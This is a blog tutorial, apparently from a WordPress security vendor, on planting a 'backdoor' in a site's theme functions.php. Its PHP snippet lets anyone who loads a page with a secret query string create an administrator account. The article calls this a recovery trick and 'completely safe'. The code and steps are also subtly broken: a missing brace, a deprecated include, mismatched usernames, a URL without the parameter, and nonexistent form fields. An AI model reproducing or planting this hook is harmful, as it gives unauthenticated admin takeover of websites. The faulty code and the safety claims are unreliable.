wordpress-backdoor

How to Create a Backdoor Entry on a WordPress website

There are times when you lose access to a WordPress admin account and stuck outside without having access to it. What do you do at that time? You create a WordPress backdoor. A backdoor which can give you access whenever you are stuck in that situation.

If you create websites for other people, you might find this trick handy. If they create this kind of situation, you can recover within minutes and create your impact.

While this might sound like an unfair means of using the #code to enter the #site when you don’t have #access to it, there are certain instances when you need to regain control of your #website when it has been stolen. Click To Tweet
Prevention is always better, so remember to check out How to log in to Your WordPress Site Safely – our tips for keeping your WordPress website a little safer by using secure methods to log in.

Sometimes, you can create a new WordPress admin user account via FTP. In other cases, if previous is not possible, you might want to hack into a WordPress website (No, we do not promote illegal hacking) or create a backdoor entry for WordPress site.

 

Web security - creating a backdoor to reclaim access

Create a Backdoor Entry For WordPress Site

URL’s has a unique characteristic with them called – Query Parameters.

When you type your URL’s, sometimes, you enter extra text prefixed with ‘?’ like http://example.com/?yourQueryParameter.

This text is called query parameters and allows you to take a specific action on that page. So a single page can serve multiple functions like submitting a form. You can show a form at the start, and after submission, you can show a thanks message on the same form.

We are going to use the same concept and create a query parameter called “entryhook.” So when we use that, it will create a user account and set the authority to Administrator.

Warning: You might be tempted to edit the WordPress core files to do this, but don’t – It is never a good idea to modify any WordPress core files except wp-config.php 

 

To Create a WordPress Backdoor:

Step1:

Open the functions.php file located in your current theme’s folder. This is where we will place the code.

Step2:

Copy the following code and paste it at the end of the file:

add_action('wp_head', 'wploop_backdoor');
function wploop_backdoor() {
If ($_GET['entryhook'] == 'knockknock') {
require('wp-includes/registration.php');
If (!username_exists('username')) {
$user_id = wp_create_user('name', 'pass');
$user = new WP_User($user_id);
$user->set_role('administrator');
}
}

Step3:

Save the changes and leave the file as it is until you need to use it.

If you choose to leave the code as it is, all you need to do is create a new admin on the site. You can do this by visiting https://yoursite.com/.

Once the page has loaded, type in your new username in “name” and the password in the field “pass.”

You can, of course, make this change in the code itself by changing the ‘name’ and ‘pass’ to anything of your choice. You can also change the link to your back door by changing ‘knockknock’ or/and ‘entryhook’ to anything you want.

It is recommended you be creative and also that you write this information down in a secure location where you can easily find it again. Use random numbers and letters to make sure nobody just guesses the entry hook.

Head over to your site and try the function. It’s fun, completely safe and can help you in the future if you ever need to have a backdoor entry to your website.

Hopefully, you never need to use this trick. Keeping your WordPress password safe, to begin with, is even better. Check out our password management tips.

The backdoor is also a great way to upgrade your WordPress and blogging skills.

Leave a Comment

Your email address will not be published. Required fields are marked *

Protect your WordPress website from hackers Get Security Ninja Pro

Security Ninja protects your website from attacks and keeps a constant eye on your website files and warns you if a virus found its way.

Keep your website safe &
prevent downtime due to security issues.

  • Fix complicated security issues with one click.
  • Keep all custom WordPress files in check
  • Discover modified files in WordPress
  • Cloud Firewall - Instant protection from millions of bad IPs
  • Events Logger - Know everything that's going on your site.

20% OFF

Subscribe to our newsletter

* We do not spam or share your email

GET

On any WP Security Ninja plan

and get

Welcome back :-)